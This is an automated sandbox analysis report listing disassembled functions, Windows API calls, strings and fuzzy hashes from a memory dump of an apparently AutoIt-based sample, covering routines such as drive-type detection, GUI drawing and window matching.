Instruction Fuzzy Hash: B5A19571A41209BFEB14DBA8DD89FBE7BB9EB44710F108115F615AB2E0D770AD01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009CAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009CAF89
GetDriveTypeW.KERNEL32(?,009EFAC0,?,\\.\,009EF910), ref: 009CB066
SetErrorMode.KERNEL32(00000000,009EFAC0,?,\\.\,009EF910), ref: 009CB1C4

Strings

MMC, xrefs: 009CB185
ATAPI, xrefs: 009CB138
1394, xrefs: 009CB146
Unknown, xrefs: 009CB086, 009CB12A
ATA, xrefs: 009CB13F
USB, xrefs: 009CB15B
SCSI, xrefs: 009CB131
CDROM, xrefs: 009CB09A
RAMDisk, xrefs: 009CB090
iSCSI, xrefs: 009CB169
SATA, xrefs: 009CB177
RAID, xrefs: 009CB162
Virtual, xrefs: 009CB18C
Network, xrefs: 009CB0A4
\\.\, xrefs: 009CAFDB
SSD, xrefs: 009CB0F1
PhysicalDrive, xrefs: 009CB012
Removable, xrefs: 009CB0B8
SAS, xrefs: 009CB170
FileBackedVirtual, xrefs: 009CB193
SSA, xrefs: 009CB14D
Fibre, xrefs: 009CB154
Fixed, xrefs: 009CB0AE

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: e21bf25bf776f20d7349b606f5bf533fc6f08a84051dc22c7b94b8fe8eeadb73
Instruction ID: b0455c255fca3ce91ba69276ebe98ab740555607f7aae556574a3621c96be206
Opcode Fuzzy Hash: e21bf25bf776f20d7349b606f5bf533fc6f08a84051dc22c7b94b8fe8eeadb73
Instruction Fuzzy Hash: 7C518230E89245AB8B10DB50C9A3FBD73B4BB64356F28481DE40AE72D1C7399E819B43

Uniqueness

Uniqueness Score: -1.00%

Function 00966A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00966A91
__wcsnicmp.LIBCMT ref: 00966AA9
__wcsnicmp.LIBCMT ref: 00966AC1
__wcsnicmp.LIBCMT ref: 00966AD9
__wcsnicmp.LIBCMT ref: 00966AF1
__wcsnicmp.LIBCMT ref: 00966B09
__wcsnicmp.LIBCMT ref: 00966B21
__wcsnicmp.LIBCMT ref: 00966B35
__wcsnicmp.LIBCMT ref: 00966B76
__wcsnicmp.LIBCMT ref: 00966B8A
__wcsnicmp.LIBCMT ref: 00966B9E
__wcsnicmp.LIBCMT ref: 00966BB2

Strings

Unterminated group of comments, xrefs: 0099E82C
#notrayicon, xrefs: 00966AA3
Bad directive syntax error, xrefs: 0099E743
#include, xrefs: 00966B03
Cannot parse #include, xrefs: 0099E819
#pragma compile, xrefs: 00966A8B
#include-once, xrefs: 00966AEB
#requireadmin, xrefs: 00966ABB
#ce, xrefs: 00966BAC
#comments-start, xrefs: 00966B1B, 00966B70
#cs, xrefs: 00966B2F, 00966B84
#comments-end, xrefs: 00966B98
#OnAutoItStartRegister, xrefs: 00966AD3

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 4eb72de181fa4ae86348628f16a08aea204cb15928913824a3527bf81c5006e5
Instruction ID: d8a261f4e80b0025a78872083200f79fe9c5db5c69964ead5da7d855797ab10a
Opcode Fuzzy Hash: 4eb72de181fa4ae86348628f16a08aea204cb15928913824a3527bf81c5006e5
Instruction Fuzzy Hash: B4812770604205FBCF25FFA4CD92FAE7B5CAF95700F048025F945EA282EB60EA41C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 009EAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 009EAB99
SetTextColor.GDI32(?,?), ref: 009EAB9D
GetSysColorBrush.USER32(0000000F), ref: 009EABB3
GetSysColor.USER32(0000000F), ref: 009EABBE
CreateSolidBrush.GDI32(?), ref: 009EABC3
GetSysColor.USER32(00000011), ref: 009EABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 009EABE9
SelectObject.GDI32(?,00000000), ref: 009EABFA
SetBkColor.GDI32(?,00000000), ref: 009EAC03
SelectObject.GDI32(?,?), ref: 009EAC10
InflateRect.USER32(?,000000FF,000000FF), ref: 009EAC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009EAC46
GetWindowLongW.USER32(00000000,000000F0), ref: 009EAC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009EACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 009EACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 009EACEC
DrawFocusRect.USER32(?,?), ref: 009EACF7
GetSysColor.USER32(00000011), ref: 009EAD05
SetTextColor.GDI32(?,00000000), ref: 009EAD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 009EAD21
SelectObject.GDI32(?,009EA869), ref: 009EAD38
DeleteObject.GDI32(?), ref: 009EAD43
SelectObject.GDI32(?,?), ref: 009EAD49
DeleteObject.GDI32(?), ref: 009EAD4E
SetTextColor.GDI32(?,?), ref: 009EAD54
SetBkColor.GDI32(?,?), ref: 009EAD5E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 9ea551c8187c175be2d270c4cc0ce027fd5fee210838311a736381422858329f
Instruction ID: 1400cd79dff5542e3782f1a92a4976b1c0d2136209a06912af60161410f35256
Opcode Fuzzy Hash: 9ea551c8187c175be2d270c4cc0ce027fd5fee210838311a736381422858329f
Instruction Fuzzy Hash: C7618F71904248FFDF119FA5DC88EAE7B79EB48320F208126F911AB2A1D7759D40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009E8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 009E8D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009E8D45
CharNextW.USER32(0000014E), ref: 009E8D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 009E8DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 009E8DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009E8DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 009E8DF9
SetWindowTextW.USER32(?,0000014E), ref: 009E8E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 009E8E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 009E8E8C
_memset.LIBCMT ref: 009E8EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 009E8EFA
_memset.LIBCMT ref: 009E8F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 009E8F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 009E8FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 009E9088
InvalidateRect.USER32(?,00000000,00000001), ref: 009E90AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009E90F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009E9121
DrawMenuBar.USER32(?), ref: 009E9130
SetWindowTextW.USER32(?,0000014E), ref: 009E9158

Strings

0, xrefs: 009E90C2

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 8a65fa1ad759777614b6c87a5bed0928d30d1b0d5536f0843def4b2cf7f29f9d
Instruction ID: 09235f3e8a093bba60955cc6153f3d347877093d753bfb9eed37a4639216667c
Opcode Fuzzy Hash: 8a65fa1ad759777614b6c87a5bed0928d30d1b0d5536f0843def4b2cf7f29f9d
Instruction Fuzzy Hash: EFE1B270904289ABDF22DFA5CC84EEF7B79EF05710F10855AF9199A290DB708E81DF61

Uniqueness

Uniqueness Score: -1.00%

Function 009E4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 009E4C51
GetDesktopWindow.USER32 ref: 009E4C66
GetWindowRect.USER32(00000000), ref: 009E4C6D
GetWindowLongW.USER32(?,000000F0), ref: 009E4CCF
DestroyWindow.USER32(?), ref: 009E4CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009E4D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009E4D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009E4D68
SendMessageW.USER32(?,00000421,?,?), ref: 009E4D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009E4D90
IsWindowVisible.USER32(?), ref: 009E4DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 009E4DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 009E4DDF
GetWindowRect.USER32(?,?), ref: 009E4DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 009E4E1D
GetMonitorInfoW.USER32(00000000,?), ref: 009E4E37
CopyRect.USER32(?,?), ref: 009E4E4E
SendMessageW.USER32(?,00000412,00000000), ref: 009E4EB9

Strings

tooltips_class32, xrefs: 009E4D1D
0, xrefs: 009E4BFC
(, xrefs: 009E4E2A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 674a6283cdc8c1c3481a345f184842920b9ae2712287b3f742a92330cda3c31c
Instruction ID: 2222630a76848ec0bd98b3fdd6b89d65bf2de367bbde1a1499b7c7e986eff709
Opcode Fuzzy Hash: 674a6283cdc8c1c3481a345f184842920b9ae2712287b3f742a92330cda3c31c
Instruction Fuzzy Hash: F1B18D71608381AFDB05DF25C888B6ABBE8FF88714F00891DF5999B2A1D775EC04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009C46D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 009C46E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009C470E
_wcscpy.LIBCMT ref: 009C473C
_wcscmp.LIBCMT ref: 009C4747
_wcscat.LIBCMT ref: 009C475D
_wcsstr.LIBCMT ref: 009C4768
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 009C4784
_wcscat.LIBCMT ref: 009C47CD
_wcscat.LIBCMT ref: 009C47D4
_wcsncpy.LIBCMT ref: 009C47FF

Strings

\VarFileInfo\Translation, xrefs: 009C477C
04090000, xrefs: 009C47BA
StringFileInfo\, xrefs: 009C4757
%u.%u.%u.%u, xrefs: 009C4862
DefaultLangCodepage, xrefs: 009C47E7

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 2959cfb60d0902ca2bf247543b15719824c1d0958f25bae4d0cd97c46f2a0503
Instruction ID: 5d8df7fa83b0c19b70a09e217c06a7aa4a25c8e5d889657b0e843460de9bc1c9
Opcode Fuzzy Hash: 2959cfb60d0902ca2bf247543b15719824c1d0958f25bae4d0cd97c46f2a0503
Instruction Fuzzy Hash: 49410672A042107BEB11BB648C53FBF77ACEFC1710F00416AF905E6282EB759A0197A6

Uniqueness

Uniqueness Score: -1.00%

Function 009627D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009628BC
GetSystemMetrics.USER32(00000007), ref: 009628C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009628EF
GetSystemMetrics.USER32(00000008), ref: 009628F7
GetSystemMetrics.USER32(00000004), ref: 0096291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00962939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00962949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0096297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00962990
GetClientRect.USER32(00000000,000000FF), ref: 009629AE
GetStockObject.GDI32(00000011), ref: 009629CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 009629D5

Part of subcall function 00962344: GetCursorPos.USER32(?), ref: 00962357
Part of subcall function 00962344: ScreenToClient.USER32(00A267B0,?), ref: 00962374
Part of subcall function 00962344: GetAsyncKeyState.USER32(00000001), ref: 00962399
Part of subcall function 00962344: GetAsyncKeyState.USER32(00000002), ref: 009623A7

SetTimer.USER32(00000000,00000000,00000028,00961256), ref: 009629FC

Strings

AutoIt v3 GUI, xrefs: 00962974

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: ea4143de701c32dfa4d45c94aefa5a3f14bdfb31dec1326867173aae5b8e9fd8
Instruction ID: 88c9c7f4126121b48d087cc4e5868fabd9a58bf5297decb2aad5ade380a23562
Opcode Fuzzy Hash: ea4143de701c32dfa4d45c94aefa5a3f14bdfb31dec1326867173aae5b8e9fd8
Instruction Fuzzy Hash: E7B17D71A0024AEFDB14DFA8DC95BAE7BB4FB48314F108129FA15AB290DB74E841DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009E4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009E40F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009E41B6

Strings

GETTEXT, xrefs: 009E415F
SELECT, xrefs: 009E4250
GETSELECTEDCOUNT, xrefs: 009E4199
SELECTINVERT, xrefs: 009E4286
GETSUBITEMCOUNT, xrefs: 009E4141
DESELECT, xrefs: 009E42A4
GETSELECTED, xrefs: 009E42E4
GETITEMCOUNT, xrefs: 009E4128
VIEWCHANGE, xrefs: 009E4375
SELECTALL, xrefs: 009E421D
FINDITEM, xrefs: 009E4329
SELECTCLEAR, xrefs: 009E4235
ISSELECTED, xrefs: 009E41C1

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: a5a39fe905622e27cd1052c5779e71828e4cdb25d1cf30c33838f64b934032a3
Instruction ID: 0a2ae83b4f36ac736d9ba2e5ccfbeebfd9e1acfaa343816fdd21b6632de63a7b
Opcode Fuzzy Hash: a5a39fe905622e27cd1052c5779e71828e4cdb25d1cf30c33838f64b934032a3
Instruction Fuzzy Hash: 8FA17F302143419BCB14EF25CA51B6AB3EABFC4314F14496DB8AA9B3D2DB34EC09CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009D52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 009D5309
LoadCursorW.USER32(00000000,00007F8A), ref: 009D5314
LoadCursorW.USER32(00000000,00007F00), ref: 009D531F
LoadCursorW.USER32(00000000,00007F03), ref: 009D532A
LoadCursorW.USER32(00000000,00007F8B), ref: 009D5335
LoadCursorW.USER32(00000000,00007F01), ref: 009D5340
LoadCursorW.USER32(00000000,00007F81), ref: 009D534B
LoadCursorW.USER32(00000000,00007F88), ref: 009D5356
LoadCursorW.USER32(00000000,00007F80), ref: 009D5361
LoadCursorW.USER32(00000000,00007F86), ref: 009D536C
LoadCursorW.USER32(00000000,00007F83), ref: 009D5377
LoadCursorW.USER32(00000000,00007F85), ref: 009D5382
LoadCursorW.USER32(00000000,00007F82), ref: 009D538D
LoadCursorW.USER32(00000000,00007F84), ref: 009D5398
LoadCursorW.USER32(00000000,00007F04), ref: 009D53A3
LoadCursorW.USER32(00000000,00007F02), ref: 009D53AE
GetCursorInfo.USER32(?), ref: 009D53BE
GetLastError.KERNEL32(00000001,00000000), ref: 009D53E9

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 5d34d0c5e3462d821a3e2476079099118d492e906c6cc640f85eb70d43e4ce22
Instruction ID: 194e2782e01854c5c4ec62f27610cf28db6ca5d4fb29beb1b4b6cdb8d2776fcb
Opcode Fuzzy Hash: 5d34d0c5e3462d821a3e2476079099118d492e906c6cc640f85eb70d43e4ce22
Instruction Fuzzy Hash: E1415470E48319AADB109FBA8C4996EFFFCEF51B50B10452FE509E7290DAB89501CF51

Uniqueness

Uniqueness Score: -1.00%

Function 009BAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 009BAAA5
__swprintf.LIBCMT ref: 009BAB46
_wcscmp.LIBCMT ref: 009BAB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009BABAE
_wcscmp.LIBCMT ref: 009BABEA
GetClassNameW.USER32(?,?,00000400), ref: 009BAC21
GetDlgCtrlID.USER32(?), ref: 009BAC73
GetWindowRect.USER32(?,?), ref: 009BACA9
GetParent.USER32(?), ref: 009BACC7
ScreenToClient.USER32(00000000), ref: 009BACCE
GetClassNameW.USER32(?,?,00000100), ref: 009BAD48
_wcscmp.LIBCMT ref: 009BAD5C
GetWindowTextW.USER32(?,?,00000400), ref: 009BAD82
_wcscmp.LIBCMT ref: 009BAD96

Part of subcall function 0098386C: _iswctype.LIBCMT ref: 00983874

Strings

%s%u, xrefs: 009BAB40

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 819158aaac09ef913da0ed81ff7a705d720818d2ee59b5ea8582805f8bc3ead2
Instruction ID: 87d084201a3c54e7c432567383807a7328be922017fa4096bb403a3a0a607315
Opcode Fuzzy Hash: 819158aaac09ef913da0ed81ff7a705d720818d2ee59b5ea8582805f8bc3ead2
Instruction Fuzzy Hash: 60A1BF71204246AFD714DF64CA84BEABBECFF84325F108629F9A992191D730E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009BB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 009BB3DB
_wcscmp.LIBCMT ref: 009BB3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 009BB414
CharUpperBuffW.USER32(?,00000000), ref: 009BB431
_wcscmp.LIBCMT ref: 009BB44F
_wcsstr.LIBCMT ref: 009BB460
GetClassNameW.USER32(00000018,?,00000400), ref: 009BB498
_wcscmp.LIBCMT ref: 009BB4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 009BB4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 009BB518
_wcscmp.LIBCMT ref: 009BB528
GetClassNameW.USER32(00000010,?,00000400), ref: 009BB550
GetWindowRect.USER32(00000004,?), ref: 009BB5B9

Strings

ThumbnailClass, xrefs: 009BB4A3, 009BB523
@, xrefs: 009BB3BC

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 00d373570b707ffd4d027e77aa02e3319b524321fc6ff345b47331edcafe9ab5
Instruction ID: 32be3b8da8a646804166382ab1b3d517c1220ddc1792cd27dbf7d64177b16988
Opcode Fuzzy Hash: 00d373570b707ffd4d027e77aa02e3319b524321fc6ff345b47331edcafe9ab5
Instruction Fuzzy Hash: 8A819F710082499BDB14DF10CA85FAA77ECFF84724F04856AFD858A0E2DBB4DD45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009BB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 009BB23F

Strings

[HANDLE:, xrefs: 009BB24B
[ALL, xrefs: 009BB2E5
HANDLE=, xrefs: 009BB238
ALL, xrefs: 009BB2D3
[CLASS:, xrefs: 009BB28F
LAST, xrefs: 009BB204
[ACTIVE, xrefs: 009BB22C
REGEXP=, xrefs: 009BB254
CLASSNAME=, xrefs: 009BB27C
ACTIVE, xrefs: 009BB21A
[REGEXPTITLE:, xrefs: 009BB267
[LAST, xrefs: 009BB2EC

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

